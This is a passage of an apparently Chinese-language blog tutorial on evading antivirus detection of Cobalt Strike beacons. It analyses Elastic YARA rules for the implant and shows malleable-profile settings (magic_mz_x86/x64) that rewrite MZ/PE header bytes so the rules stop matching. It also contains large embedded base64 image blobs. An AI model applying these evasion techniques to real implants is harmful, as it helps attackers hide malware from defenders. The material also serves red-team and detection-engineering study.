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
</p>
<p>？？？我看了一下Windows_Trojan_CobaltStrike_ee756db7的判定规则，发现该规则需要至少6个命中才会判定</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>虽然这种方法简单且有效，但是从实际考虑来说，我们不应该全部都这么做，因为无法确定其他安全公司使用的规则，如果修改了判断规则为3个你只修改其中一个，那肯定是不行的，并且有些格式化字符串也不应该直接修改，否则可能会给程序带来不可意料的结果，如Windows_Trojan_CobaltStrike_3dc22d14中还检测了一些格式化字符串</p>
<p>当然也不是没有解决方法。那就是sleepmask kit套件，后面会详细介绍</p>
<h4 id=0x0312-mz头pe头处理>
 0x0312 MZ头/PE头处理
 <a class=heading-link href=#0x0312-mz%e5%a4%b4pe%e5%a4%b4%e5%a4%84%e7%90%86>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h4>
<p>可以看到Windows_Trojan_CobaltStrike_1787eef5的特征为4D 5A，很明显该处检测的是MZ</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>可以从内存中看到，确实存在该特征</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>针对这种情况，CobaltStrike提供了可以在profile中配置 <code>Stage.magic_mz_*</code>/<code>Stage.magic_pe_*</code>对其进行修改</p>
<p>官方建议：需要注意的是，对于magic_mz_* 选项，提供的值必须是有效的（无）操作码，因为它们是作为shellcode存根的一部分执行的第一条指令。通常情况下，这将是<code>pop regA，push regA</code>的某种变体，因为后一条指令撤消了第一条指令，但请参阅<a href=https://www.redteam.cafe/red-team/shellcode-injection/magic_mz_x86-and-magic_mz_x64 class=external-link target=_blank rel=noopener>此处</a>以获得有关配置此选项的更多指导</p>
<p>修改mz头</p>
<pre tabindex=0><code>set magic_mz_x86 "KC@H"; # ASM = dec ebx, inc ebx,inc eax, dec eax
set magic_mz_x64 "A[AS"; # ASM = pop r11, push r11
</code></pre><p>修改pe头</p>
